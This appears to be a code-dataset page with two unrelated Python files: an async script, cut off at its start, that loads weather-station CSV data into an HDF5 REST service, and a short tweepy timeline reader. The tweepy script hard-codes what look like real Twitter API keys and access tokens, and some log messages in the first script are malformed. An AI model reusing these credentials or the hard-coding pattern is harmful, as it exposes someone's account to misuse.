h5path_cache = globals["h5path_cache"]
params = {"host": domain}
parent_group = h5path_cache['/'] # start with root
group_names = h5path.split('/')
headers = getRequestHeaders()
base_req = getEndpoint() + '/groups/'
next_path = '/'
timeout = config.get("timeout")
for group_name in group_names:
if not group_name:
continue # skip empty names
next_path += group_name
if not next_path.endswith('/'):
next_path += '/' # prep for next roundtrips
if next_path in h5path_cache:
# we already have the group id
parent_group = h5path_cache[next_path]
continue
req = base_req + parent_group + "/links/" + group_name
log.info("GET " + req)
globals["request_count"] += 1
async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
if rsp.status == 404:
parent_group = await createGroup(parent_group, group_name)
elif rsp.status != 200:
raise HttpProcessingError(code=rsp.status, message="Unexpected error")
else:
rsp_json = await rsp.json()
link_json = rsp_json["link"]
if link_json["class"] != "H5L_TYPE_HARD":
raise ValueError("Unexpected Link type: {}".format(link_json))
parent_group = link_json["id"]
h5path_cache[next_path] = parent_group
return parent_group
async def verifyDomain(domain):
""" create domain if it doesn't already exist
"""
params = {"host": domain}
headers = getRequestHeaders()
client = globals["client"]
req = getEndpoint() + '/'
root_id = None
log.info("GET " + req)
globals["request_count"] += 1
timeout = config.get("timeout")
async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
if rsp.status == 200:
domain_json = await rsp.json()
else:
log.info("got status: {}".format(rsp.status))
if rsp.status == 200:
root_id = domain_json["root"]
elif rsp.status == 404:
# create the domain
log.info("PUT " + req)
globals["request_count"] += 1
async with client.put(req, headers=headers, params=params, timeout=timeout) as rsp:
if rsp.status != 201:
log.error("got status: {} for PUT req: {}".format(rsp.status, req))
raise HttpProcessingError(code=rsp.status, message="Unexpected error")
log.info("GET " + req)
globals["request_count"] += 1
async with client.get(req, headers=headers, params=params, timeout=timeout) as rsp:
if rsp.status == 200:
domain_json = await rsp.json()
root_id = domain_json["root"]
else:
log.error("got status: {} for GET req: {}".format(rsp.status, req))
raise HttpProcessingError(code=rsp.status, message="Service error")
globals["root"] = root_id
async def import_line(line):
domain = globals["domain"]
params = {"host": domain}
headers = getRequestHeaders()
client = globals["client"]
globals["lines_read"] += 1
task_log = {}
task_log["line"] = line
task_log["start"] = time.time()
fields = line.split(',')
if len(fields) != 8:
log.warn("unexpected number of fields in line: [()]".format(line))
return
station = fields[0]
if len(station) != 11:
log.warn("unexpected station length line: [()]".format(line))
return
date = fields[1]
if len(date) != 8:
log.warn("unexpected station length line: [()]".format(line))
return
obstype = fields[2]
if len(obstype) != 4:
log.warn("unexpected obstype length line: [()]".format(line))
return
value = 0
try:
value = int(fields[3])
except ValueError:
log.warn("unexpected value in line: [()]".format(line))
return
# TBD - do something with other fields
log.info("data: {} {} {} {}".format(station, obstype, date, value))
h5path = "/data/" + station + "/" + obstype
task_log["h5path"] = h5path
task_log["state"] = "INPROGRESS"
globals["tasks"].append(task_log) # add before the first await
try:
grp_id = await verifyGroupPath(h5path)
except HttpProcessingError as hpe:
log.error("failed to verifyGroupPath: {}, err: {}".format(h5path, str(hpe)))
globals["failed_line_updates"] += 1
task_log["state"] = "COMPLETE"
return
# create the attribute
data = {'type': 'H5T_STD_I32LE', 'value': value}
req = getEndpoint() + "/groups/" + grp_id + "/attributes/" + date
log.info("PUT " + req)
globals["request_count"] += 1
task_log["req"] = req
timeout = config.get("timeout")
async with client.put(req, headers=headers, data=json.dumps(data), params=params, timeout=timeout) as rsp:
task_log["stop"] = time.time()
task_log["state"] = "COMPLETE"
task_log["status"] = rsp.status
if rsp.status == 409:
log.warn("409 for req: " + req)
elif rsp.status != 201:
log.error("got status: {} for req: {}".format(rsp.status, req))
globals["failed_line_updates"] += 1
else:
globals["attribute_count"] += 1
def import_file(filename):
log.info("import_file: {}".format(filename))
loop = globals["loop"]
max_concurrent_tasks = config.get("max_concurrent_tasks")
tasks = []
with open(filename, 'r') as fh:
for line in fh:
line = line.rstrip()
#loop.run_until_complete(import_line(line))
tasks.append(asyncio.ensure_future(import_line(line)))
if len(tasks) < max_concurrent_tasks:
continue # get next line
# got a batch, move them out!
loop.run_until_complete(asyncio.gather(*tasks))
tasks = []
# finish any remaining tasks
loop.run_until_complete(asyncio.gather(*tasks))
globals["files_read"] += 1
def print_results():
log.info("h5path_cache...")
h5path_cache = globals["h5path_cache"]
elapsed_time = time.time() - globals["start_time"]
keys = list(h5path_cache.keys())
keys.sort()
for key in keys:
log.info("{} -> {}".format(key, h5path_cache[key]))
print("files read: {}".format(globals["files_read"]))
print("lines read: {}".format(globals["lines_read"]))
print("lines unable to process: {}".format(globals["failed_line_updates"]))
print("num groups: {}".format(len(keys)))
print("attr created: {}".format(globals["attribute_count"]))
print("requests made: {}".format(globals["request_count"]))
latencies = []
tasks = globals["tasks"]
for task in tasks:
# print(task)
if "start" in task and "stop" in task:
latency = task["stop"] - task["start"]
latencies.append(latency)
timings = np.array(latencies)
print("latencies...")
print("runtime: {0:.2f} s".format(elapsed_time))
print("lines/sec: {0:.2f}".format(globals["lines_read"]/elapsed_time))
print("avg: {0:.2f} s".format(timings.mean()))
print("min: {0:.2f} s".format(timings.min()))
print("max: {0:.2f} s".format(timings.max()))
print("std: {0:.2f} s".format(timings.std()))
def sig_handler(sig, frame):
log.warn("Caught signal: {}".format(str(sig)))
print_results()
sys.exit()
def main():
domain = "/home/" + config.get("user_name") + "/" + config.get("domain_name")
print("domain: {}".format(domain) )
getFileList() # populates file_list global
log.info("initializing")
signal.signal(signal.SIGTERM, sig_handler) # add handlers for early exit
signal.signal(signal.SIGINT, sig_handler)
loop = asyncio.get_event_loop()
globals["loop"] = loop
#domain = helper.getTestDomainName()
# create a client Session here so that all client requests
# will share the same connection pool
max_tcp_connections = int(config.get("max_tcp_connections"))
client = ClientSession(loop=loop, connector=TCPConnector(limit=max_tcp_connections))
globals["client"] = client
globals["files_read"] = 0
globals["lines_read"] = 0
globals["attribute_count"] = 0
globals["request_count"] = 0
globals["tasks"] = []
globals["failed_line_updates"] = 0
loop.run_until_complete(getEndpoints())
if len(globals["sn_endpoints"]) == 0:
log.error("no SN endpoints found!")
loop.close()
client.close()
sys.exit()
for endpoint in globals["sn_endpoints"]:
log.info("got endpoint: {}".format(endpoint))
loop.run_until_complete(verifyDomain(domain))
globals["domain"] = domain # save the domain
# keep a lookup table of h5paths to obj ids to reduce server roundtrips
h5path_cache = {'/': globals["root"]}
globals["h5path_cache"] = h5path_cache
log.info("domain root: {}".format(globals["root"]))
loop.run_until_complete(verifyGroupPath("/data"))
input_files = globals["input_files"]
globals["start_time"] = time.time()
for filename in input_files:
import_file(filename)
loop.close()
client.close()
print_results()
main() |
import tweepy
consumer_key = "B4PbUyBHiQbch0VxFSKB2tWJf"
consumer_secret = "SbSc0v79lRYKJdzN8IDFZ3gXRKnI9DpFxOVf3mtsg3uEHJBVHN"
access_token = "3020843641-cibXWf5cW8xCXoBTw2CUId6jIcb1jfhap5mJndJ"
access_token_secret = "nYZHd4NxNemcvmjvBQtIriGyUWB6tLvJMn4T354G3pCax"
auth = tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api = tweepy.API(auth)
public_tweets = api.home_timeline()
for tweet in public_tweets:
print (tweet.text)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.